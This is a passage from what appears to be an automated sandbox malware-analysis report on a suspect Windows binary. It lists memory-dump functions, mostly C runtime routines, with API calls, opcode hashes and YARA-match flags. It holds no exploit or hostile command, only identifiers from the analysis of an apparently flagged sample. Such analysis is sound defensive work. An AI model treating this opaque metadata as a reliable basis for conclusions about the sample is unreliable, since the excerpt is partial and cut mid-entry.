                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                  • Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction ID: 95edb75e536639b33972a857d440f8be94c0c6db010a7eda39038c13656bb89e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FA11372A083869FDB218F18C8817EBBBF1EF55354F1541AEE4859B381C63C8D82C758
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC7FD6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                  • Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction ID: 4674efe4965d144bef2fe8c79c065a22c1d5b3eb3253546161a631e8ae109b42
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6A15731A047869FEB12CF18C885BBABFE6FF15350F2441EEF4969B240C278A941C758
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042299F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
                                                                                                                                                                                                                                  • Instruction ID: c8489a2078e21136fa723fa80d13f2eda68097992bc6546b806c704246c56682
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE414C31B402217BDB306E7A9D41BAF3A64EF45374F54025BF818D6691DAFC8C9182AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD2C06 Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 963c7352d2e0a54c0d0f88c3f11fb2999fab24a43c9dca7c6f6700f89c7226dd
                                                                                                                                                                                                                                  • Instruction ID: 16c27d9d87f115b3e862be60103cea5af2a22176580fd3dcae83df27c67d8e9f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 963c7352d2e0a54c0d0f88c3f11fb2999fab24a43c9dca7c6f6700f89c7226dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC412E39B005486BDB256BB88C49E7EFE65FF45370F1802D9F424D6290FA34B9414775
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BCB690 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042D740,00000000,00000000,8B56FF8B,05BC4002,?,00000004,00000001,0042D740,0000007F,?,8B56FF8B,00000001), ref: 05BCB6DD
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 05BCB766
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 05BCB778
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 05BCB781
                                                                                                                                                                                                                                    • Part of subcall function 05BC7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05BC7CDE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2652629310-0
                                                                                                                                                                                                                                  • Opcode ID: 418993263a88c618d282e3586c2c640cbdd5746430a48a443b1d1fb7bcbd7a35
                                                                                                                                                                                                                                  • Instruction ID: bbddd49d6033b00fe8dc9382879e7329c9e4e14c16d20418035ab5884cc4a9d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 418993263a88c618d282e3586c2c640cbdd5746430a48a443b1d1fb7bcbd7a35
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1231B072A0020AABDF258F64CC85EFE7BA9FF40210B4501ADEC15E6150EB75E954CBA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040CCA4 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCBE
                                                                                                                                                                                                                                    • Part of subcall function 0040CC0B: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC3A
                                                                                                                                                                                                                                    • Part of subcall function 0040CC0B: ___AdjustPointer.LIBCMT ref: 0040CC55
                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0040CCD3
                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCE4
                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 0040CD0C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 737400349-0
                                                                                                                                                                                                                                  • Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                  • Instruction ID: 6cd8a4fdf9e309ef40a66346d060796d29459ceaa081db5c793327cde4683266
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA012D72500108BBDF116F96CC81DEB3F69EF98758F044129FE0866261C73AE861DBA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BBCF0B Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 05BBCF25
                                                                                                                                                                                                                                    • Part of subcall function 05BBCE72: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 05BBCEA1
                                                                                                                                                                                                                                    • Part of subcall function 05BBCE72: ___AdjustPointer.LIBCMT ref: 05BBCEBC
                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 05BBCF3A
                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 05BBCF4B
                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 05BBCF73
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 737400349-0
                                                                                                                                                                                                                                  • Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                  • Instruction ID: bb83e87807fa51f18eab5373ea9d8a32b047ab17b384d5dd86c4373ef4cf008b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1011B72600109BBEF12AE95CC44EFB7F69FF88654F044094FE0856120D6F6E9659BA0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC74BA Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,05BBED94,00000000,00000000,?,05BC7461,05BBED94,00000000,00000000,00000000,?,05BC7719,00000006,0042E2F8), ref: 05BC74EC
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,05BC7461,05BBED94,00000000,00000000,00000000,?,05BC7719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000,00000364,?,05BC7052), ref: 05BC74F8
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,05BC7461,05BBED94,00000000,00000000,00000000,?,05BC7719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000), ref: 05BC7506
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                  • Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction ID: e749e6ede7422d030fe99b6efb11d0062d895a9c4f16aa4056a04a85dbae9126
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E301D8327566265BC7318B68AC44E567F99FF0566175145BCF906D3181DF20E4018ADC
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041293D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 004129CD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                  • Opcode ID: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
                                                                                                                                                                                                                                  • Instruction ID: e0eefe9174cd7462181434ea84c362ca9420c476202b864f0baa4bab5f354a80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D515DB1B5420196C7217B19CE813EB2B90EB40744F64496BE085C23E8EB7D8CE7DA4E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041E281 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041DE54: GetOEMCP.KERNEL32(00000000,?,?,0041E0DD,?), ref: 0041DE7F
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0041E122,?,00000000), ref: 0041E2F5
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,"A,?,?,?,0041E122,?,00000000), ref: 0041E308
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                  • String ID: "A
                                                                                                                                                                                                                                  • API String ID: 546120528-1838006985
                                                                                                                                                                                                                                  • Opcode ID: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
                                                                                                                                                                                                                                  • Instruction ID: 9adfac426f14955098f9a8953225ebda5108e0851b5f4a0d8690ab915da4ef9e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F511774A002499EDB208F36C8846FBBBE5EF51304F14446FD8A68B251D73D95C6CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD65BB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BD65C0
                                                                                                                                                                                                                                    • Part of subcall function 05BB4073: __EH_prolog.LIBCMT ref: 05BB4078
                                                                                                                                                                                                                                    • Part of subcall function 05BB4073: std::locale::_Init.LIBCPMT ref: 05BB409A
                                                                                                                                                                                                                                  • _Deallocate.LIBCONCRT ref: 05BD6714
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$DeallocateInitstd::locale::_
                                                                                                                                                                                                                                  • String ID: hzB
                                                                                                                                                                                                                                  • API String ID: 2389838984-4102550090
                                                                                                                                                                                                                                  • Opcode ID: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
                                                                                                                                                                                                                                  • Instruction ID: 5fd5c13b9f091a04797739cfdbb9c98c091ca2776678ba22d5646f2c746456ff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A651BD71A01248DFEB04DFA9C8949EDFBB5FF48300F64426EE406A7281D7B1AA45CF50
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041DF2C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DF51
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                                                  • String ID: $^A
                                                                                                                                                                                                                                  • API String ID: 1807457897-1499568600
                                                                                                                                                                                                                                  • Opcode ID: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                  • Instruction ID: 9b2ab00e05afc5395f67001553a0f729d0bbf79a9b46b691f859092dfb419bf1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46415CB49042589EDB218E25CC80BFABFE9DB49304F1404EEE58A87143D2799AC6CF64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BBCA17 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 05BBCA4A
                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 05BBCB03
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                  • Instruction ID: f29af19f78bdcb3fb31678597ce27bfd89c6a3c34b52b539268ab693ff9d6940
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3141A270A0020A9BEF10DF28C844AFE7FB5FF45314F1480A6E915AB295D7F5AD05CB90
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041FEC2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0042011D,?,00000050,?,?,?,?,?), ref: 0041FF9D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                                                  • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction ID: dacf84d8a1ebef4056087089fc013b288552bfb44d7b698df7e4a4e4da77cf20
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F721F472B04101A6D7308B54D901BDBA3A6EB52B24F564077F90AC7301FBBADDCBC258
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD0129 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,05BD0384,?,00000050,?,?,?,?,?), ref: 05BD0204
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                                                  • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction ID: 62f6d092a35866b61dff8e9f45f7e47235634dd6734710cc7be0f1cad3082e61
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63218E62A45209A6E724AB548D09BA7F2ABFF84A51F6684F4F90AD7100F732F9418274
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BB33DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BB33E1
                                                                                                                                                                                                                                  • std::locale::_Init.LIBCPMT ref: 05BB3428
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: __EH_prolog3.LIBCMT ref: 05BB7FE1
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: std::_Lockit::_Lockit.LIBCPMT ref: 05BB7FEC
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: std::locale::_Setgloballocale.LIBCPMT ref: 05BB8007
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: _Yarn.LIBCPMT ref: 05BB801D
                                                                                                                                                                                                                                    • Part of subcall function 05BB7FDA: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB805D
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: __EH_prolog.LIBCMT ref: 05BB3656
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: std::_Lockit::_Lockit.LIBCPMT ref: 05BB3665
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: int.LIBCPMT ref: 05BB367C
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: std::locale::_Getfacet.LIBCPMT ref: 05BB3685
                                                                                                                                                                                                                                    • Part of subcall function 05BB3651: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB36CC
                                                                                                                                                                                                                                    • Part of subcall function 05BB1AE6: __CxxThrowException@8.LIBVCRUNTIME ref: 05BB1B30
                                                                                                                                                                                                                                    • Part of subcall function 05BB1AE6: std::system_error::system_error.LIBCPMT ref: 05BB1B3F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
